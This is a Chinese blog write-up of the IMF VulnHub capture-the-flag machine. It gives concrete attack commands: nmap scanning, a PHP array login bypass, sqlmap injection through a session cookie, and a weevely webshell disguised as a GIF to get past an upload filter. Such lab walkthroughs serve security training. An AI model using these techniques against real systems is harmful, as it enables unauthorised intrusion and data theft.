靶机渗透测试 IMF vulhub

最新推荐文章于 2024-04-24 00:19:12 发布
最新推荐文章于 2024-04-24 00:19:12 发布
阅读量986 收藏 2
点赞数
分类专栏: web kali 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zizizizizi_/article/details/109774541
版权
web 同时被 2 个专栏收录
8 篇文章 1 订阅
订阅专栏
kali
4 篇文章 5 订阅
订阅专栏

具体过程

1.靶机的ip地址
netdiscover -i eth0 -r 网关

在这里插入图片描述
2.nmap扫描开放的端口
nmap -sS -Pn -A -p- -n 192.168.1.106
在这里插入图片描述
3.80端口(http服务)开放
在这里插入图片描述
4.

flag1

去contact us页面 ctrl+u查看源码
在这里插入图片描述flag1{YWxsdGhlZmlsZXM=}
我们发现flag1里面是base64编码,解码查看

allthefiles

5.

flag2

还是这页的源码,这三行合在一起是flag2

在这里插入图片描述
flag2{aW1mYWRtaW5pc3RyYXRvcg==}
flag2里面也是base64编码 解码得到

6.

flag3

尝试访问此目录
在这里插入图片描述
我们去http://192.168.1.106/contact.php

发现一些用户名

在这里插入图片描述挨个尝试,发现rmichaels是可以的

将pass字段重命名为pass[]。

用户名使用rmichaels,将pass字段重命名为pass[]

在这里插入图片描述
在这里插入图片描述
更改完 Forward 获得flag3
在这里插入图片描述flag3{Y29udGludWVUT2Ntcw==} 解码得

continueTOcms

7.

flag4

点击刚刚flag3页面的 链接
在这里插入图片描述
发现URL是有一个参数pagename
复制cookie信息然后使用sqlmap
sqlmap.py -u “http://192.168.1.106/imfadministrator/cms.php?pagename=upload” --cookie “PHPSESSID=h7bjmao2fec21vgjig4fk9m0d6” --dbs

在这里插入图片描述
爆破出数据库

在这里插入图片描述爆破admin这个数据库
sqlmap.py -u http://… -T 数据库 -D 数据表 -C 字段 --dump

在这里插入图片描述
在这里插入图片描述
进入新页面 扫描二维码 都得flag3

在这里插入图片描述flag4{dXBsb2Fkcjk0Mi5waHA=} 解码得

uploadr942.php

8.

flag5

访问新页面 发现为文件上传漏洞;
发现文件限制只能上传jpg,png,gif类型文件
在这里插入图片描述尝试过很多方法都会被拦截,最终我们使用weevely来生成脚本
(weevely是一款使用python编写的webshell工具,集webshell生成和连接于一身,可以算作是linux下的一款菜刀替代工具(限于php),在linux上使用时还是很给力的,就是某些模块在windows上无法使用,总的来说还是非常不错的一款工具。)

命令:weevely generate t00r ~/shell.php
在这里插入图片描述
修改文件头 后缀为gif

在这里插入图片描述

上传成功 查看源码

在这里插入图片描述
查看
在这里插入图片描述
使用weevely连接木马
命令:weevely http://192.168.1.106/imfadministrator/uploads/8699d618f9cf.gif jesse
在这里插入图片描述flag5{YWdlbnRzZXJ2aWNlcw==}
解码得

agentservices

**

8.flag6需要利用逆向知识本人还不是了解!!!

参考博客:
https://blog.csdn.net/weixin_46700042/article/details/108835878

少说话多办事zsq
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
vulhub - IMF writeup
Jiajiajiang_的博客
04-16 2309
主机来源:www.vulnhub.com 下载地址:https://download.vulnhub.com/imf/IMF.ova 准备工作: 下载.ova文件,直接双击即可安装成功。 设置连接方式为NAT,攻击机器使用kali,也设置为NAT。 发现IP 刚安装的虚拟机并不知道IP地址,使用netdiscover发现IP。 发现IP为10.0.3.131。 端口...
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】
hyjcking的博客
12-01 1293
今天这台靶机涉及的知识点非常全面 1.有文件上传漏洞 2.基于cookie的sql注入漏洞 3.sqlmap的使用 4.用kali自带的木马生成工具weevely生成绕waf的一句话木马 5.使用绕waf的木马和普通gif结合生成gif图片木马, 6.使用knock敲开隐藏的服务器端口, 7.使用ltrace函数跟踪进程的库函数调用从而得到正确id, 8.用msfvenom生成一个针对性的shellcode然后对目标服务器端口进行缓冲区溢出攻击从而得到root权限
【甄选靶场】Vulnhub百个项目渗透——项目九:IMF-1(文件上传,缓冲区溢出)
人间体佐菲的博客
09-23 2749
Vulnhub百个项目渗透——项目九:IMF-1(文件上传,缓冲区溢出) 网络安全,信息安全,渗透测试
VulnHub靶机 DC-8 打靶实战 详细渗透过程
最新发布
rumil的博客
04-24 1372
主机发现—端口扫描—服务探针—指纹识别—发现注入点—web渗透SQL注入—获取用户名密码—登入后台—发现可加载PHP代码输入PHP代码—反弹shell—提权—exim4漏洞利用。将其拷贝到本地,发现靶机有wget命令,那么可以通过wget进行下载,本地通过python开启一个http服务。访问web界面,通过上述信息收集加插件,得到以下信息,采用Drupal CMS,版本为Drupal 7。找到可代码执行的地方,或者可以输入代码的地方,尝试输入,保存即可。查看数据库当中的表信息,还有表中的内容。
No.8-VulnHub-IMF: 1-Walkthrough渗透学习
qq_34801745的博客
01-06 2711
** VulnHub-IMF: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用“ IMF”,这是我的第一个Boot2Root虚拟机。IMF是一个情报机构,您必须骇入所有标志并最终扎根。这些标志起步容易,随着您的前进而变得越来越难。每个标志...
【打靶记录】VulnHub-IMF靶机渗透wp
qq_39972370的博客
01-14 1082
IMF 是一个初级难度的boot 2 root 靶机。 flag难度从简单到困难,并且每个flag都含有关于获取下一个flag的提示。
vulhub渗透测试靶机学习1
08-08
渗透测试靶机学习】 渗透测试靶机是安全研究人员和网络安全爱好者用来提升技能和实践渗透测试技巧的模拟环境。在本文中,我们将讨论两个靶机环境:Lampiao 和 Kioptrix Level 1.2 (#3),以及如何对它们进行初步的...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
【甄选靶场】Vulnhub百个项目渗透——项目八:IMF-1(文件上传,缓冲区溢出)
人间体佐菲的博客
08-24 1045
【甄选靶场】Vulnhub百个项目渗透——项目八:IMF-1(文件上传,缓冲区溢出)
渗透项目(八):IMF-1
Ays.Ie的博客
01-15 582
该篇文章记录了作者第八个渗透项目,内容很多,希望能帮助到其他同学学习!
靶机渗透测试IMF
@小张小张的博客
09-29 2735
靶机渗透测试IMF): Vulnhub靶机 IMF 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Easy) 目标:Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root). 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 靶机ip:192.168.10.29 2. nmap进行靶机端口服务扫描
VulnHub-IMF-靶机渗透学习
嗯嗯呐的博客
11-26 2777
靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机描述:欢迎使用“ IMF”,这是我的第一个Boot2Root虚拟机。IMF是一个情报机构,您必须骇入所有标志并最终扎根。这些标志起步容易,随着您的前进而变得越来越难。每个标志都包含下一个标志的提示。我希望您喜欢这个虚拟机并学到一些东西。 目标:得到root权限&找到六个flag.txt 作者:嗯嗯呐 目录信息收集PHP数组绕过getshell缓冲区溢出提权总结 信息收集 Nmap
vulnhub-IMF 靶机的上传和linux缓冲区溢出
冬萍子癸水
04-22 528
这篇文章暂时只记录上传和linux bof。。。。留我自己学习和记录 上传这里检测的挺严的。。。system passthru这些函数都能检测,即便是改文件为图片,加gif89在开头都没用。。。 这个时候用weevely很方便,加密了php函数代码。 创建go.php 然后密码是666.再把这个php文件改为gif文件 weevely generate 666 go.php mv go.ph...
小白的靶机-VulnHub-IMF
wo41ge的博客
12-24 325
靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 目标:得到root权限&找到四个flag.txt 开机界面就是个这 确定靶机地址:192.168.86.172 发现80端口 运行着Apache 直接上页面康康 这个选项 右键源代码发现flag1 flag1{YWxsdGhlZmlsZXM=} 发现这是一个base64的加密 进行解码 allthefiles 还有一个base64加密的标签 解码康康 这里有一个坑 他们三个 是连在一起的 只有
8-vulnHub-IMF
尼德霍格007
07-23 452
VulnHub-IMF 靶机地址: 目标:得到root权限&找到6个flag.txt 作者:尼德霍格007 时间:2021-7-23 信息收集 扫描目标主机 nmap -sP 192.168.21.0/24 扫描开放端口 发现只开放了80端口,访问看看 flag1 在Contact Us页面源码中发现flag1 flag1{YWxsdGhlZmlsZXM=} 大括号内是是一个base64值,解密一下 allthefiles 继续搜索看看还有没有base64值,搜到还有,继续解码 flag
渗透测试VulnHub-IMF: 1
m0_52923241的博客
12-05 526
VulnHub-IMF: 1VulnHub-IMF: 1渗透思路小知识点一、php中使用url传递数组的方法二、sqlmap用到的参数理解三、文件上传提权四、缓冲区溢出常用工具一、weevely:(Linux菜刀)php webshell的安全测试工具二、ltrace:跟踪进程调用库函数的情况工具 VulnHub-IMF: 1渗透思路 参考文章:VulnHub-IMF: 1渗透测试详细流程 参考文章:VulnHub-IMF: 1渗透测试详细流程 渗透思路: 第一步,还是nmap扫ip,端口,开放80端口,访
Zico2靶机渗透测试实战指南
"该文档是关于使用Zico2作为靶机进行渗透测试的实战指南,主要涵盖实验环境的设置、信息收集以及渗透测试的步骤。Zico2是一个用于安全研究和教育的虚拟机,适用于练习渗透测试技术。" 在渗透测试领域,Zico2靶机...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

少说话多办事zsq

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值